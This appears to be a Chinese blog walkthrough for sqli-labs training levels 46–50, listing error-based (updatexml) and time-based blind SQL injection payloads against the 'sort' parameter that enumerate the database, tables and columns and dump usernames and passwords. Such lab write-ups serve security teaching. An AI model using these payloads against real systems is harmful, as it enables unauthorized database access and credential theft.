sqli-labs靶场通关攻略 46-50

云舒zovn2024-09-02 19:35

主页有sqli-labs靶场通关攻略 1-45

第四六关 less-46

步骤一:利用报错注入查询库

?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)

步骤二:查询表名

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)

步骤三:查看user表中列名

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

步骤四:查询数据

?sort=1 and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)

第四七关 less-47

步骤一:利用报错注入查询库

?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+

步骤二:查询表名

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) --+

步骤三:查看user表中列名

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

步骤四:查询数据

?sort=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1) --+

第四八关 less-48

步骤一:利用时间盲注查询数据库

?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114

输入?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

得出数据库长度为'security'

步骤二:查询表名

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)

第一个表名为'email'

第四九关 less-49

步骤一:利用时间盲注查询数据库

?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114

输入?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

得出数据库长度为'security'

步骤二:查询表名

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

?sort=1'and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

第一个表名为'email'

第五十关 less-50

步骤一:利用报错注入查询库

?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)--+

步骤二:查询表名

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)--+

步骤三:查看user表中列名

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+

步骤四:查询数据

?sort=1 and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)--+

相关推荐
有想法的py工程师12 分钟前
PostgreSQL 测试磁盘性能
数据库·postgresql
Zhsh-720 分钟前
centos配置ES和MYSQL自动备份
mysql·elasticsearch·centos
2301_7976042422 分钟前
d41:MyBatisPlus入门,注解,配置,条件构造器,自定义SQL,IService
sql·mybatis
尘下吹霜1 小时前
【鉴权架构】SpringBoot + Sa-Token + MyBatis + MySQL + Redis 实现用户鉴权、角色管理、权限管理
spring boot·mysql·mybatis
weixin_441455261 小时前
Mysql MVCC
数据库·mysql
Su-RE2 小时前
【ElasticSearch】text 和 keyword 类型区分
java·数据库·elasticsearch
武子康2 小时前
Java-146 深入浅出 MongoDB 数据插入、批量写入、BSON 格式与逻辑查询and or not操作指南
java·开发语言·数据库·sql·mongodb·性能优化·nosql
奥尔特星云大使2 小时前
MySQL快速构建主从(基于GTID)
数据库·mysql·主从复制
小园子的小菜2 小时前
MySQL ORDER BY 深度解析:索引排序规则与关键配置参数阈值
数据库·mysql
wxjlkh2 小时前
Oracle Exadata一体机简介 1千多个W
数据库·oracle
热门推荐
01BongoCat - 跨平台键盘猫动画工具02两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答03智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践04GitHub 镜像站点052025羊城杯网络安全大赛 wp06UV安装并设置国内源07Linux下V2Ray安装配置指南08GitLab 零基础入门指南:从安装到项目管理全流程09Spring Boot 实现微信登录,So Easy !10Cursor Plan Mode:AI 终于知道先想后做了